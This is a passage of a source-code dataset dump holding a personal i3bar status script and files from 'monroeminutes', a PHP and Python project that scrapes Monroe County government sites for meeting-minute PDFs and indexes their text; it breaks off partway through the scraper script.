"content_id": "54edaf116e517fc3d882ab00bc0ab50211c57e94",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 979,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 27,
"path": "/i3gaps/status.py",
"repo_name": "davebs/daves-linux-configs",
"src_encoding": "UTF-8",
"text": "from datetime import timedelta\nimport psutil\nimport subprocess\n\n# strip and format uptime values out of uptime output\nwith open('/proc/uptime', 'r') as f:\n uptime_seconds = float(f.readline().split()[0])\n uptime_string = str(timedelta(seconds = uptime_seconds))\n uptime_string = uptime_string.split(':')[:2]\n uptime_string = ''.join(uptime_string[0].split(',')) + \\\n ' hours ' + uptime_string[1] + ' minutes'\n\n# I want to add GPU info at some point with values scraped\n# out of nvidia-smi\n#data = subprocess.check_output('/usr/bin/nvidia-smi', '')\n\n# figure out how much memory we're using\nmemory = psutil.virtual_memory()\nmemory = format(memory.used/1000000000, ',.1f') + \\\n '/' + format(memory.total/1000000000, ',.1f') + \\\n 'gb (' + str(memory.percent) + '%)'\n\n# the following text ends up on your i3bar\n# TODO: Make downspeed and upspeed accurate\nprint \"Uptime: %s | Mem Used: %s | Down: 0kb | Up: 0kb\" % (uptime_string, memory)\n\nexit(0)\n"
}
] | 3 |
hhroc/monroeminutes | https://github.com/hhroc/monroeminutes | 583cfa81ba369cf4f097aebd2601413ad57d729e | 04bebb81fd46a88b6d778f17454da03036577191 | b4c5b2cabcfa3fdb464b2656c1064acafd31c535 | refs/heads/master | 2021-01-23T20:39:23.711825 | 2013-06-04T19:33:29 | 2013-06-04T19:33:29 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5628342032432556,
"alphanum_fraction": 0.5635026693344116,
"avg_line_length": 23.129032135009766,
"blob_id": "d9fcab0ce975a2facd040afb0f7f5667fd47778d",
"content_id": "e007d6855781bfe33853bd068d8ff879d29d4d74",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 2992,
"license_type": "no_license",
"max_line_length": 155,
"num_lines": 124,
"path": "/web/tools/OrganizationsManager.class.php",
"repo_name": "hhroc/monroeminutes",
"src_encoding": "UTF-8",
"text": "<?\n\n\trequire_once(\"DatabaseTool.class.php\");\n\n\tclass OrganizationsManager\n\t{\n\t\tfunction add($name,$type,$websiteurl)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'INSERT INTO organizations(name,type,websiteurl) VALUES(?,?,?)';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"sss\", $name,$type,$websiteurl);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\t\t\n\t\t\t\t$row = $results[0];\n\t\t\t\t$retVal = (object) array('organizationid' => $row['organizationid'],'name' => $row['name'],'type' => $row['type'],'websiteurl' => $row['websiteurl']);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t\n\t\t\treturn $retVal;\n\t\t}\n\n\t\tfunction get($organizationid)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'SELECT * FROM organizations WHERE organizationid = ?';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"s\", $organizationid);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\t\t\n\t\t\t\t$row = $results[0];\n\t\t\t\t$retVal = (object) array('organizationid' => $row['organizationid'],'name' => $row['name'],'type' => $row['type'],'websiteurl' => $row['websiteurl']);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t\n\t\t\treturn $retVal;\n\t\t}\n\n\t\tfunction getall()\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'SELECT * FROM organizations';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\t\t\n\t\t\t\t$retArray = array();\n\t\t\t\tforeach( $results as $row )\n\t\t\t\t{\n\t\t\t\t\t$object = (object) array('organizationid' => $row['organizationid'],'name' => $row['name'],'type' => $row['type'],'websiteurl' => $row['websiteurl']);\n\t\t\t\t\t$retArray[] = $object;\n\t\t\t\t}\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t\n\t\t\treturn $retArray;\n\t\t}\n\n\t\tfunction del($organizationid)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'DELETE FROM organizations WHERE organizationid = ?';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"s\", $organizationid);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t}\n\n\t\tfunction update($name,$type,$websiteurl)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'UPDATE organizations SET name = ?,type = ?,websiteurl = ? WHERE organizationid = ?';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"ssss\", $name,$type,$websiteurl, $organizationid);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t}\n\n\t\t///// Application Specific Functions\n\n\t}\n\n?>\n"
},
{
"alpha_fraction": 0.5085910558700562,
"alphanum_fraction": 0.5137457251548767,
"avg_line_length": 15.19444465637207,
"blob_id": "fe6a0994adc1e1190b037c75ab2a0b00bc5728d5",
"content_id": "405759bd590493292b75df4cff2119361f846453",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 582,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 36,
"path": "/web/api/preview.php",
"repo_name": "hhroc/monroeminutes",
"src_encoding": "UTF-8",
"text": "<?\n\t\n\t$docid = $_GET['docid'];\n\t$keyword = $_GET['keyword'];\n\t\n\t// default values\n\t$error = \"Invalid document ID\";\n\t$preview = \"\";\n\t\n\tif( is_numeric($docid) == True )\n\t{\n\t\trequire_once(\"../tools/DocumenttextsManager.class.php\");\n\t\t\n\t\t$dtmgr = new DocumenttextsManager();\n\t\t\n\t\t$doctext = $dtmgr->getbydocid($docid);\n\t\t\n\t\tif( $doctext != \"\" )\n\t\t{\n\t\t\t$error = \"None\";\n\t\t\t\n\t\t\tif( strlen($doctext) > 512 )\n\t\t\t{\n\t\t\t\t//if( strpos($doctext,$keyword) < )\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\t$preview = $doctext;\n\t\t\t}\n\t\t}\n\t}\n\n\t\n\techo '{\"\"error\" : \"' . $error . '\", \"previewtext\" : \"' . $preview . '\"}';\n\n?>"
},
{
"alpha_fraction": 0.5324675440788269,
"alphanum_fraction": 0.5333951711654663,
"avg_line_length": 30.647058486938477,
"blob_id": "3fc1f24389b57d8acc52a562e8cedd58a95a8edb",
"content_id": "756260f748f03e173f3a01265b51cf59ddeda727",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2156,
"license_type": "no_license",
"max_line_length": 183,
"num_lines": 68,
"path": "/scripts/orphans.py",
"repo_name": "hhroc/monroeminutes",
"src_encoding": "UTF-8",
"text": "import MySQLdb as mdb\nimport _mysql as mysql\nimport re\n\nclass orphans:\n\n __settings = {}\n __con = False\n\n def __init__(self):\n configfile = \"sqlcreds.txt\"\n f = open(configfile)\n for line in f:\n # skip comment lines\n m = re.search('^\\s*#', line)\n if m:\n continue\n\n # parse key=value lines\n m = re.search('^(\\w+)\\s*=\\s*(\\S.*)$', line)\n if m is None:\n continue\n\n self.__settings[m.group(1)] = m.group(2)\n f.close()\n\n # create connection\n self.__con = mdb.connect(host=self.__settings['host'], user=self.__settings['username'], passwd=self.__settings['password'], db=self.__settings['database'])\n\n def add(self,orphanid,url,orphandt,scrapeurlid,organizationid):\n with self.__con:\n cur = self.__con.cursor()\n cur.execute(\"INSERT INTO orphans(orphanid,url,orphandt,scrapeurlid,organizationid) VALUES(%s,%s,%s,%s,%s)\",(orphanid,url,orphandt,scrapeurlid,organizationid))\n cur.close()\n newid = cur.lastrowid\n return newid\n\n def get(self,):\n with self.__con:\n cur = self.__con.cursor()\n cur.execute(\"SELECT * FROM orphans WHERE = %s\",())\n row = cur.fetchone()\n cur.close()\n\n def getall(self):\n with self.__con:\n cur = self.__con.cursor()\n cur.execute(\"SELECT * FROM orphans\")\n rows = cur.fetchall()\n cur.close()\n\n _orphans = []\n for row in rows:\n _orphans.append(row)\n\n return _orphans\n\n def delete(self,):\n with self.__con:\n cur = self.__con.cursor()\n cur.execute(\"DELETE FROM orphans WHERE = %s\",())\n cur.close()\n\n def update(self,orphanid,url,orphandt,scrapeurlid,organizationid):\n with self.__con:\n cur = self.__con.cursor()\n cur.execute(\"UPDATE orphans SET orphanid = %s,url = %s,orphandt = %s,scrapeurlid = %s,organizationid = %s WHERE = %s\",(orphanid,url,orphandt,scrapeurlid,organizationid,))\n cur.close()\n\n\n\n\n"
},
{
"alpha_fraction": 0.577751874923706,
"alphanum_fraction": 0.5859056711196899,
"avg_line_length": 27.85714340209961,
"blob_id": "5913f0a30aecfcc8b9b8c0adb9b51f3442d73576",
"content_id": "be049d8d1b974d996e493ca9b0923ffb208ecdd8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3434,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 119,
"path": "/scripts/generateignorelist.py",
"repo_name": "hhroc/monroeminutes",
"src_encoding": "UTF-8",
"text": "import sys\nimport os\nfrom random import randint\nfrom bs4 import BeautifulSoup\nimport urllib\nimport urllib2\nimport datetime\nimport magic\n\nfrom scrapeurls import scrapeurls\nfrom ignoreurls import ignoreurls\n\ndef report(type,text):\n if type == \"info\":\n type = \"INFO \"\n elif type == \"warning\":\n type = \"WARNING\"\n elif type == \"error\":\n type = \"ERROR \"\n else:\n type = \"OTHER \"\n print \"[{0}] {1}\".format(type,text)\n\ndef get_url_list():\n surls = scrapeurls()\n urls = surls.getall()\n return urls\n\ndef get_ignore_list():\n iurls = ignoreurls()\n urls = iurls.getall()\n retval = []\n for url in urls:\n ignoreurlid,ignoreurl,ignoredt,scrapeurlid = url\n retval.append(ignoreurl)\n return urls\n\ndef get_page_links(url):\n html = urllib2.urlopen(url)\n soup = BeautifulSoup(html)\n atags = soup.find_all('a', href=True)\n return atags\n\ndef decode_link_url(tag,siteurl,baseurl):\n # make sure the URL is formatted correctly\n if tag['href'][0:7].lower() == \"http://\":\n linkurl = tag['href']\n else:\n if tag['href'][0:1] == \"/\":\n # absolute link\n linkurl = siteurl + tag['href']\n else:\n # relative link\n linkurl = baseurl + tag['href']\n return linkurl\n\ndef download_link(url):\n # get the filename off of the url, then set the local file to that + a random number .pdf, and download it\n urlfile = url[url.rfind(\"/\")+1:]\n _filename = \"./downloads/{0}_{1}.download\".format(urlfile,randint(0,1000000))\n filename,headers = urllib.urlretrieve(url,_filename)\n return filename\n\ndef add_to_ignore_list(link,scrapeurlid):\n dt = datetime.datetime.now().date().isoformat()\n iurls = ignoreurls()\n iurls.add(link,dt,scrapeurlid)\n\ndef check_if_pdf(filename):\n result = magic.from_file(filename,mime=True)\n report(\"info\",\"File Type = {0}\".format(result))\n return (result == 'application/pdf')\n\ndef delete_file(filename):\n os.remove(filename)\n\ndef main(argv):\n\n print \"\\nStarting Application ...\\n\"\n\n urls = get_url_list();\n\n report(\"info\",\"Processing {0} scraper URL's\".format(len(urls)))\n\n for _url in urls:\n scrapeurlid,url,name,organizationid,enabled = _url\n \n if enabled == False:\n continue\n\n # decode the base url and site url\n baseurl = url[:url.rfind(\"/\")+1]\n siteurl = url[:url.find(\"/\",7)]\n\n # get all of the links from the page\n links = get_page_links(url)\n report(\"info\",\"{0} page links found on {1}\".format(len(links),url))\n\n # iterate through the list of links and deturmine which ones are not PDFs\n for _link in links:\n ignorelist = get_ignore_list()\n \n link = decode_link_url(_link,siteurl,baseurl)\n \n # make sure that it isn't already in the list\n if not (link in ignorelist):\n filename = download_link(link)\n success = check_if_pdf(filename)\n delete_file(filename)\n \n if success == True:\n report(\"info\",\"PDF Found at `{0}`.\".format(link))\n else:\n add_to_ignore_list(link,scrapeurlid)\n report(\"info\",\"Added `{0}` to ignore list.\".format(link))\n \n print \"\\nExiting Application ...\\n\"\n\nif __name__ == '__main__': sys.exit(main(sys.argv))\n"
},
{
"alpha_fraction": 0.6804733872413635,
"alphanum_fraction": 0.6804733872413635,
"avg_line_length": 22.34482765197754,
"blob_id": "a0eb5e375a48824f3a7006619a908150f34961e9",
"content_id": "ad65d1e43bb7389bb7359dfe6472c2fac09b326e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 676,
"license_type": "no_license",
"max_line_length": 175,
"num_lines": 29,
"path": "/web/about.php",
"repo_name": "hhroc/monroeminutes",
"src_encoding": "UTF-8",
"text": "<?php\n\trequire_once(\"_header.php\");\n?>\n\n\n\tMonroe Minutes is a aggregator of various different types of documents from various organizations whithin Monroe County, NY. MonroeMinutes.org pulls documents from \n\t<?php\n\t\n\t\t// TODO: get number of Organizations\n\t\techo \"####\";\n\t\n\t?>\n\t organizations located in \n\t<?php\n\t\n\t\t// TODO: get number of Bodies\n\t\techo \"####\";\n\t\n\t?>\n\t towns, villages, and cities within Monroe County, NY!<br>\n\t <br>\n\t For more information on how Monroe Minutes works, how to use it's features, and how you can help make Monroe Minutes better check out the <a href=\"about.php\">About Page</a>.\n\n\n\t<!-- Put Code Here -->\n\n<?php\n\trequire_once(\"_footer.php\");\n?>"
},
{
"alpha_fraction": 0.5185185074806213,
"alphanum_fraction": 0.5185185074806213,
"avg_line_length": 11.11111068725586,
"blob_id": "62fe5578ae81affa2096c041c9415cba1d064cee",
"content_id": "5d8f4c35ce124aa0d6d245446c1f91daa21653c9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 108,
"license_type": "no_license",
"max_line_length": 32,
"num_lines": 9,
"path": "/web/admin/logout.php",
"repo_name": "hhroc/monroeminutes",
"src_encoding": "UTF-8",
"text": "<?php\n\trequire_once(\"../_header.php\");\n?>\n\n\t<!-- Logout Page -->\n\t\n<?php\n\trequire_once(\"../_footer.php\");\n?>"
},
{
"alpha_fraction": 0.5769017338752747,
"alphanum_fraction": 0.5777345895767212,
"avg_line_length": 23.33783721923828,
"blob_id": "443bd74d584a13510a4136d353f19aa29476b016",
"content_id": "b0e322c77ddfd639e6ae3665dfe5a9a1a26a1100",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 3602,
"license_type": "no_license",
"max_line_length": 148,
"num_lines": 148,
"path": "/web/tools/DocumenttextsManager.class.php",
"repo_name": "hhroc/monroeminutes",
"src_encoding": "UTF-8",
"text": "<?\n\n\trequire_once(\"DatabaseTool.class.php\");\n\n\tclass DocumenttextsManager\n\t{\n\t\tfunction add($documentid,$documenttext)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'INSERT INTO documenttexts(documentid,documenttext) VALUES(?,?)';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"ss\", $documentid,$documenttext);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\t\t\n\t\t\t\t$row = $results[0];\n\t\t\t\t$retVal = (object) array('documenttextid' => $row['documenttextid'],'documentid' => $row['documentid'],'documenttext' => $row['documenttext']);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t\n\t\t\treturn $retVal;\n\t\t}\n\n\t\tfunction get($documenttextid)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'SELECT * FROM documenttexts WHERE documenttextid = ?';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"s\", $documenttextid);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\t\t\n\t\t\t\t$row = $results[0];\n\t\t\t\t$retVal = (object) array('documenttextid' => $row['documenttextid'],'documentid' => $row['documentid'],'documenttext' => $row['documenttext']);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t\n\t\t\treturn $retVal;\n\t\t}\n\n\t\tfunction getall()\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'SELECT * FROM documenttexts';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\t\t\n\t\t\t\t$retArray = array();\n\t\t\t\tforeach( $results as $row )\n\t\t\t\t{\n\t\t\t\t\t$object = (object) array('documenttextid' => $row['documenttextid'],'documentid' => $row['documentid'],'documenttext' => $row['documenttext']);\n\t\t\t\t\t$retArray[] = $object;\n\t\t\t\t}\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t\n\t\t\treturn $retArray;\n\t\t}\n\n\t\tfunction del($documenttextid)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'DELETE FROM documenttexts WHERE documenttextid = ?';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"s\", $documenttextid);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t}\n\n\t\tfunction update($documentid,$documenttext)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'UPDATE documenttexts SET documentid = ?,documenttext = ? WHERE documenttextid = ?';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"sss\", $documentid,$documenttext, $documenttextid);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t}\n\n\t\t///// Application Specific Functions\n\n\t\tfunction getbydocid($docid)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'SELECT * FROM documenttexts WHERE documentid = ?';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"s\", $documenttextid);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\t\t\n\t\t\t\t$row = $results[0];\n\t\t\t\t$retVal = (object) array('documenttextid' => $row['documenttextid'],'documentid' => $row['documentid'],'documenttext' => $row['documenttext']);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t\n\t\t\treturn $retVal;\n\t\t}\n\n\t}\n\n?>\n"
},
{
"alpha_fraction": 0.5966386795043945,
"alphanum_fraction": 0.5966386795043945,
"avg_line_length": 12.333333015441895,
"blob_id": "e9d870e09be7ff90dac0bab82d69424d23963c65",
"content_id": "1db47648d5d6130d9a218b5d9067c6cff63beb81",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 119,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 9,
"path": "/web/index.php",
"repo_name": "hhroc/monroeminutes",
"src_encoding": "UTF-8",
"text": "<?php\n\trequire_once(\"_header.php\");\n?>\n\n\t<a href=\"search.php\">Go To Search</a>\n\t\n<?php\n\trequire_once(\"_footer.php\");\n?>"
},
{
"alpha_fraction": 0.5931307673454285,
"alphanum_fraction": 0.5944517850875854,
"avg_line_length": 27.037036895751953,
"blob_id": "1717aa0f203956fa77f08891efad5e8c477ece40",
"content_id": "7ac1d0067caae3906b58d9cde56f3b40112a6972",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1514,
"license_type": "no_license",
"max_line_length": 246,
"num_lines": 54,
"path": "/scripts/decodepdf.py",
"repo_name": "hhroc/monroeminutes",
"src_encoding": "UTF-8",
"text": "from pdfminer.pdfinterp import PDFResourceManager, process_pdf\nfrom pdfminer.converter import TextConverter\nfrom pdfminer.layout import LAParams\n\nimport hashlib\n\nfrom cStringIO import StringIO\n\nfrom suborganizations import suborganizations\n\ndef _pdf_to_text(path):\n\n try:\n rsrcmgr = PDFResourceManager()\n retstr = StringIO()\n codec = 'ascii'\n laparams = LAParams()\n laparams.all_texts = True\n device = TextConverter(rsrcmgr, retstr, codec=codec, laparams=laparams)\n\n with open(path, 'rb') as fp:\n process_pdf(rsrcmgr, device, fp)\n device.close()\n\n # fix the non-utf8 string ...\n result = retstr.getvalue()\n txt = result.encode('ascii','ignore')\n\n retVal = (txt,True)\n retstr.close()\n\n except Exception,e:\n #print str(e)\n #print \"\\tERROR: PDF is not formatted correctly, aborting.\"\n retVal = (\"\", False)\n pass\n\n return retVal\n\ndef scrubtext(text):\n scrubstr = text.replace(',','').replace('.','').replace('?','').replace('/',' ').replace(':','').replace(';','').replace('<','').replace('>','').replace('[','').replace(']','').replace('\\\\',' ').replace('\"','').replace(\"'\",'').replace('`','')\n\n return scrubstr\n\ndef decodepdf(path):\n\n pdftext,success = _pdf_to_text(path)\n #pdftext = _scrub_text(pdftext)\n\n texthash = \"\"\n if success == True:\n texthash = hashlib.md5(pdftext).hexdigest()\n \n return success,pdftext,texthash\n"
},
{
"alpha_fraction": 0.514018714427948,
"alphanum_fraction": 0.514018714427948,
"avg_line_length": 11,
"blob_id": "029b4be68e32298b9254c5725b11282e24db9697",
"content_id": "88066615203c9ec8af48bf4c4528663b8338449c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 107,
"license_type": "no_license",
"max_line_length": 32,
"num_lines": 9,
"path": "/web/admin/login.php",
"repo_name": "hhroc/monroeminutes",
"src_encoding": "UTF-8",
"text": "<?php\n\trequire_once(\"../_header.php\");\n?>\n\n\t<!-- Login Page -->\n\t\n<?php\n\trequire_once(\"../_footer.php\");\n?>"
},
{
"alpha_fraction": 0.594558835029602,
"alphanum_fraction": 0.6030882596969604,
"avg_line_length": 32.663368225097656,
"blob_id": "27f43849642cb6680eef4abbed31f2bbbb55b6a1",
"content_id": "7b89881873f3ed56c6728d645368f7d8024f64be",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6800,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 202,
"path": "/scripts/simplescraper.py",
"repo_name": "hhroc/monroeminutes",
"src_encoding": "UTF-8",
"text": "import os\nimport sys\nimport datetime\nimport time\nimport urllib\nimport urllib2\nfrom random import randint\nfrom bs4 import BeautifulSoup\nfrom pprint import pprint\nimport nltk\n\nfrom decodepdf import decodepdf,scrubtext\n\nfrom scrapeurls import scrapeurls\nfrom ignoreurls import ignoreurls\nfrom suborganizations import suborganizations\nfrom documents import documents\nfrom documenttexts import documenttexts\nfrom words import words\n\ndef report(type,text):\n if type == \"info\":\n type = \"INFO \"\n elif type == \"warning\":\n type = \"WARNING\"\n elif type == \"error\":\n type = \"ERROR \"\n else:\n type = \"OTHER \"\n print \"[{0}] {1}\".format(type,text)\n\ndef getorgurls(orgid):\n surls = scrapeurls()\n urls = surls.geturls(orgid)\n return urls\n\ndef getlinks(urlid,url,siteurl,baseurl):\n iurls = ignoreurls()\n ignorelinks = iurls.getallbyscrapeurlid(urlid)\n\n _pagelinks = _get_page_links(url)\n\n pagelinks = []\n for pagelink in _pagelinks:\n link = decodelink(pagelink,siteurl,baseurl)\n pagelinks.append((link.lower(),pagelink.get_text().strip()))\n\n # diff the lists, dropping links from the ignore list\n links = [x for x in pagelinks if x not in ignorelinks]\n\n #print \"len(ignorelinks) = {0}\".format(len(ignorelinks))\n #pprint(ignorelinks)\n #print \"\\n\\n\"\n #print \"len(pagelinks) = {0}\".format(len(pagelinks))\n #pprint(pagelinks)\n #print \"\\n\\n\"\n #print \"len(links) = {0}\".format(len(links))\n #pprint(links)\n #print \"\\n\\n\"\n\n return links\n\ndef _get_page_links(url):\n html = urllib2.urlopen(url)\n soup = BeautifulSoup(html)\n atags = soup.find_all('a', href=True)\n return atags\n\ndef decodelink(tag,siteurl,baseurl):\n #try:\n # make sure the URL is formatted correctly\n #print type(tag)\n #print \"decoding: {0}\".format(tag['href'])\n if len(tag['href']) >= 7 and tag['href'][0:7].lower() == \"http://\":\n linkurl = tag['href']\n #print \"1: {0}\".format(linkurl)\n else:\n if len(tag['href']) >= 1 and tag['href'][0:1] == \"/\":\n # absolute link\n linkurl = siteurl + tag['href']\n #print \"2: {0}\".format(linkurl)\n else:\n # relative link\n linkurl = baseurl + tag['href']\n #print \"3: {0}\".format(linkurl)\n #except:\n # linkurl = \"\"\n return linkurl\n\ndef downloadlink(url):\n try:\n # get the filename off of the url, then set the local file to that + a random number .pdf, and download it\n urlfile = url[url.rfind(\"/\")+1:]\n _filename = \"./downloads/{0}_{1}.download\".format(urlfile,randint(0,1000000))\n filename,headers = urllib.urlretrieve(url,_filename)\n success = True\n except:\n success = False\n filename = \"\"\n return success,filename\n\ndef addignore(link,scrapeurlid):\n dt = datetime.datetime.now().date().isoformat()\n iurls = ignoreurls()\n iurls.add(link,dt,scrapeurlid)\n\ndef getsuborg(pdfheader,orgid):\n sorgs = suborganizations()\n suborgs = sorgs.getall()\n #print \"orgid = {0}\".format(orgid)\n success = False\n for suborg in suborgs:\n suborganizationid,organizationid,name,parsename,websiteurl,documentsurl,scriptname,dbpopulated = suborg\n #pprint(suborg)\n if int(orgid) == int(organizationid):\n #print \"parsename = {0}\\n\".format(parsename.lower())\n #print \"header = {0}\\n\\n\\n\".format(pdfheader.lower())\n if parsename.lower() in pdfheader.lower():\n success = True\n break\n return success,suborganizationid\n\ndef getdocdate(pdfheader):\n # TODO: parse the header to get the date\n return \"1970-1-1\"\n\ndef getdocname(pdfheader):\n # TODO: parse the header to get the name\n return \"document\"\n\ndef savedoc(suborgid,orgid,sourceurl,documentdate,name,dochash,pdftext,tokens,orphaned):\n scrapedate = time.strftime('%Y-%m-%d')\n doc = documents()\n docid = doc.add(suborgid,orgid,sourceurl,documentdate,scrapedate,name,dochash,orphaned)\n doct = documenttexts()\n doct.add(docid,pdftext)\n wrds = words()\n for token,frequency in tokens.items():\n if len(token) > 3:\n wrds.add(docid,suborgid,orgid,token,frequency)\n return docid\n\ndef main(argv):\n print \"\\nApplication Started ...\\n\"\n\n # edit this to change the size of the pdf to look at as the header\n HEADERLENGTH = 2048\n\n if len(argv) != 2:\n print \"Usage:\\n\\tpython simplescraper.py <orgid>\"\n return\n \n orgid = argv[1]\n\n urls = getorgurls(orgid)\n\n report(\"info\",\"Organization has {0} URLS.\".format(len(urls)))\n\n for _url in urls:\n urlid,url = _url\n \n # decode the base url and site url\n baseurl = url[:url.rfind(\"/\")+1]\n siteurl = url[:url.find(\"/\",7)+1]\n\n links = getlinks(urlid,url,siteurl,baseurl)\n\n report(\"info\",\"Working on {0} Links from `{1}`\".format(len(links),url))\n\n for link,linkname in links:\n report(\"info\",\"Working on URL `{0}`\".format(link))\n success,filename = downloadlink(link)\n if success == False:\n report(\"error\",\"Bad Link Found, Skipping.\\n\")\n continue\n success,pdftext,texthash = decodepdf(filename)\n if success == True:\n docdate = getdocdate(pdftext[:HEADERLENGTH])\n #docname = getdocname(pdftext[:HEADERLENGTH])\n docname = linkname\n 